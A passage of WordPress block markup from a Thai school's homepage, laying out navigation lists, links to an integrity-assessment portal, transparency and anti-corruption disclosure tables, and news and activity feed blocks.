data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":757,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/1-1.png\" alt=\"\" class=\"wp-image-757\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":758,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-2.png\" alt=\"\" class=\"wp-image-758\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=780\" data-type=\"page\" data-id=\"780\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=716\" data-type=\"page\" data-id=\"716\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout 